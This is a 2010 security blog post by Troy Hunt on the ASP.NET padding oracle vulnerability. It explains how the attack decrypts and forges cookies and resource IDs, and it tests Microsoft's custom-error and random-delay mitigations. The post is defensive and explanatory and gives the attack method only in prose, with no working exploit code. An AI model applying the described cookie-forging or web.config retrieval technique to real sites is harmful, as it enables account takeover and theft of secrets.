Troy Hunt: Fear, uncertainty and the padding oracle exploit in ASP.NET

You’ve gotta feel a bit sorry for Scott Guthrie. Microsoft’s developer division VP normally spends his time writing about all the great new work his team is doing and basking in the kudos of loyal followers. But not this weekend. Unfortunately his latest post has been all about repeating the same dire message; ASP.NET has a major security flaw posing a critical vulnerability to millions of websites. Actually that’s putting it nicely; much of the feedback on the web is a little blunter talking about the vulnerability totally destroying ASP.NET security. Ouch.

Actually, it’s not so much the fact he had to write the post that makes me feel sorry for him, it’s that he has to continually respond to the same questions from (understandably) fearful, worried customers. It’s not surprising, the vulnerability is a little abstract to understand and the potential ramifications are rather scary. Furthermore, the mitigations he has recommended – namely around errors handling – probably seem a little obscure.

This is an issue which is quite possibly going to consume a bit of my time in the coming weeks so I thought I’d start out right now by explaining what the vulnerability is, what remediation is required and most importantly, actually show how they mitigate the problem. It’s this last point that I don’t think Scott quite captured and I suspect that’s why there is so much uncertainty now.

Sep 25th Update: I’ve also written about Why sleep is good for your app’s padding oracle
Sep 29th update: The patch and how to test for it in Do you trust your hosting provider and have they really installed the padding oracle patch?

The exploit in action

Let’s start out with a bang. Just in case you haven’t already heard about the exploit or seen what it can do, watch this before reading any further. This was demonstrated at the Ekoparty conference in Argentina a few days ago:

What just happened? In short, there were three simple steps:

The ciphertext appended to a web resource request was retrieved from the HTML source of the page. This is effectively an encrypted version of the resource identifier. It’s the algorithm behind this encryption the exploit sets out to break.
The Padding Oracle Exploit Tool (or POET) is given the URL of the site and the ciphertext from step 1. It then sets out to break the algorithm used in the encryption process. This is the heart of what the exploit is all about.
The exploited algorithm is then used to create a new, encrypted cookie with super user rights to the DotNetNuke instance in the attack. This cookie is then simply added to the browser granting the attacker all the rights they could desire over the target site.

This particular example goes on to load a malicious payload into the server allowing command line access from the UI but the damage was really done in step 3. In very simple terms, the exploit allows normally secure artefacts generated by the server to be decrypted and forged.

What’s all this got to do with Oracle?

No, not Oracle, oracle. More specifically, it’s about the oracle used against padding which in cryptography is all about discovering how encrypted versions of plain text strings are padded out to fit neatly in eight bytes. There’s a fantastic overview of how this works in Automated Padding Oracle Attacks with PadBuster if you want to understand it in depth, I’m just going to distil this to the basics. This info is almost entirely from the post in the previous sentence (as is the first image I’ve borrowed), so all credit to those guys. No guarantees on me getting all of this 100% right but hopefully the gist of it will come through ok.

Imagine every encrypted string has to consume a multiple of eight bytes of data. In order to do this, different amounts of padding are required for different string lengths:

po_fig1

One thing you’ll notice is that each padding byte represents the total number of bytes in the padding. For example, FIG has five padding bytes of 0x05. If the encrypted version of FIG contained five bytes of padding that weren’t all 0x05, the server would throw an error when it went to decrypt it. In short, the response of the server can disclose if the encrypted value is correctly padded or not. From the link above, this is called a padding oracle because:

The term oracle refers to a mechanism that can be used to determine whether a test has passed or failed.

Here’s where it gets interesting; if an encrypted string can be passed to the server and its response can tell you whether the padding is valid or not, the request can be manipulated to continually change the bytes in the request and reissue them to the server until a successful response is returned. The bytes this technique manipulates are contained in the initialisation vector (IV) which is the eight bytes preceding the encrypted string. Each byte is then used in the decryption algorithm so it’s pivotal to successfully decrypting the string.

If the IV can be manipulated until it resolves the corresponding encrypted byte to the appropriate padding value and the server confirms this by not returning an error, the process can be repeated for each byte of the IV until all eight are known. The IV can then be used to decrypt the remaining ciphertext. A similar process can be used to encrypt a new string.

This exploit isn’t actually new; it was reported eight years back by the Swiss. What is new is the way it’s been applied against ASP.NET and the fact this particular attack vector has now been published.

What can you do with this?

An awful lot, unfortunately. The obvious answer is you can decrypt any encrypted strings accessible to the client which means query strings, hidden form fields and cookies. The other problem is that because you can use the above mechanism to encrypt data, you can roll your own cookies. The DotNetNuke exploit in the video works because a perfectly valid cookie indicating the client is a super user could be forged and passed to the server with it being none the wiser. This isn’t a DotNetNuke vulnerability, it could conceivably occur with any ASP.NET site which implements authentication.

But there’s another exploit which Scott touches on in his post without going into too much detail; the web.config can be downloaded.

The attack that was shown in the public relies on a feature in ASP.NET that allows files (typically javascript and css) to be downloaded, and which is secured with a key that is sent as part of the request. Unfortunately if you are able to forge a key you can use this feature to download the web.config file of an application (but not files outside of the application).

Although I can’t find any specific references to it, I believe what Scott’s referring to is the ability to use web resources with a forged resource ID which rather than pointing to the usual JavaScript or CSS, instead points to another resource in the app. From the Working with Web Resources page:

The URL for WebResource.axd looks like the following:

WebResource.axd?d=SbXSD3uTnhYsK4gMD8fL84_mHPC5jJ7lfdnr1_WtsftZiUOZ6IXYG8QCXW86UizF0&t=632768953157700078

The format of this URL is WebResource.axd?d=encrypted identifier&t=time stamp value. The "d" stands for the requested Web Resource. The "t" is the timestamp for the requested assembly, which can help in determining if there have been any changes to the resource.

You can see how this is an appended query string value and as the video earlier showed, these requests simply return the resource in its entirety.

What’s vulnerable?

Basically any ASP.NET based products including obviously ASP.NET websites and DotNetNuke but also SharePoint and ASP.NET MVC. Of course this also extends to products like Umbraco that are offerings on top of the framework.

Mitigation

Scott makes two recommendations from which a lot of confusion then flows:

Enable custom errors with response rewriting and a single error page for all error types.
Add a random sleep delay to the error page.

On the surface of it, these seem like rather odd ways of addressing a cryptography vulnerability, but there’s method in the madness. Both these recommendations are designed to obfuscate the fact a server error has occurred. If the attacker is not being told when their manipulated IV is causing an error versus when it’s passing through successfully, the ability to exploit the vulnerability is severely hobbled.

Managing server errors

Let’s look at how using a single custom errors page helps the situation. I’ve created a standard web app with all the usual, out of the box settings and configured an IIS website against it on port 85. By default, the following JavaScript is embedded in the page (we don’t have to use a web resource file, the same logic applies to any other resource executing on the server):

<script src="/WebResource.axd?d=8KdqlbnKlEkJNojRMjxtSxbXkp67u-rzhy_VoqsYA901&amp;t=634200755509128189" type="text/javascript"></script>

Now, if I manipulate the resource ID (the “d” query string value) and reissue the request and monitor the response with Fiddler, here’s what I see:

By returning a 500 response code, IIS has just confirmed the server has thrown an error. Now let’s make the first change Scott recommended, namely creating a dedicated error page with response writing as the redirect mode and adding it as the default redirect in the custom errors node:

Now we’re getting a 200 response which for all intents and purposes means it was a successful request, at least as far as the headers go. You’ll also see the requested URL is the web resource page and not the error page. This is actually one important point that wasn’t fully explained in Scott’s post; it’s important the redirect mode is set to “ResponseRewrite”. If not, the default “ResponseRedirect” value will be applied and here’s what will happen:

Now we’re getting an HTTP 302 redirect which then asks the browser to make a separate request for “Error.aspx?aspxerrorpath=/WebResource.axd”. This pretty much gives the game away and confirms that an error has been thrown as a result of the request. By rewriting the request the error page is returned in the initial response which caused the server error rather than in a subsequent response.

Some people have asked if just turning custom errors on by specifying <customErrors mode="On" /> is sufficient. Unfortunately, it’s not and here’s why:

Obviously this once again exposes the HTTP 500 response code so although it has the advantage of not exposing the specific internal error, it still indicates the request has failed.

The other things Scott asks you to configure in the custom errors (or rather not configure), is different error pages for different error codes. A lot of people have asked what this means for their custom 404 page not found error pages, often used to provide a functional value to the user (ie. an external link points to a now defunct page). Here’s his message, repeated many, many times:

One of the ways this attack works is that looks for differentiation between 404s and 500 errors. It can use this differentiation to try out potential keys (typically over tens of thousands of requests). Always returning the same HTTP code and sending them to the same place is one way to help block it.

I haven’t seen the attack Scott talks about in practice but what’s obvious is that it’s looking for particular resources within the application. Not returning 404 page not found obfuscates the fact the resource doesn’t actually exist from automated attacks. Yes, it has a usability impact and possibly other issues beyond that (search engine crawlers, perhaps?), but he’s consistently emphatic about avoiding this particular response code so there’s obviously something in it.

Sep 20th update: the 404 risk is that if the padding oracle exploit is attempted against the resource ID in the WebResource.axd file and the manipulated IV is correct in the context of the ciphertext but the resource doesn’t exist (hence the 404), the same response is returned as if the IV was invalid. This makes the gradual incrementing of each IV byte and using the response as a success measure pointless as the response is always the same whether the byte is valid or not. The only way a 500 server error wouldn’t be returned using Scott’s recommendations is if the resource ID is correct and a valid resource is found.

Having a little sleep

The other recommendation Scott makes is to add a small, random sleep to the error page. Essentially what he’s suggesting is obfuscation of the error page load time in order to avoid establishing a pattern which could be used to identify when an error response is being returned. This is often referred to as a “remote timing” attack.

I know what you’re thinking; does adding a few milliseconds here or there really improve the security of my app? Quite a lot has been written on this subject, Exploiting remote timing attacks is but one example of many resources which talks about the practice. If you really want endorsement of why Scott’s suggestion has some merit, here’s an interesting tweet from one of the duo who produced the video:

And if there’s no big timing difference? I’m sure there’s still a way but its one more layer of defence. And it’s free.

Summary

I would have liked to have gone into this vulnerability a lot deeper. I’ve not successfully run the exploit and have instead spent the day reading and absorbing information. I’ve seen enough today to be convinced this exploit poses a serious risk and that alone is worth writing about, particularly in terms of shedding some light on the rationale behind The Gu’s recommendations.

This is one of those “first thing Monday morning” type of vulnerabilities. As the word has spread over the last couple of days and the impact has begun to sink in, there’s going to be a lot of devs arriving at the office tomorrow morning with some work to do. If you’re responsible for any ASP.NET website and you’re not making some pretty speedy changes tomorrow morning, your site may just be one of the first sites compromised by this exploit.

Scott makes multiple mentions of a patch coming from Microsoft but is very non-committal on exactly when we’ll see it. We also don’t know what form the patch will take; will it be patch to the framework requiring a server install and all the governance (and lead time) that goes along with it? Or will it mean re-deployment of apps? One thing’s for sure, it will require some legwork and getting started on the mitigation early by following his guidance is the only smart thing to do at this stage.

We live in interesting times.

Resources

Security .NET

Fear, uncertainty and the padding oracle exploit in ASP.NET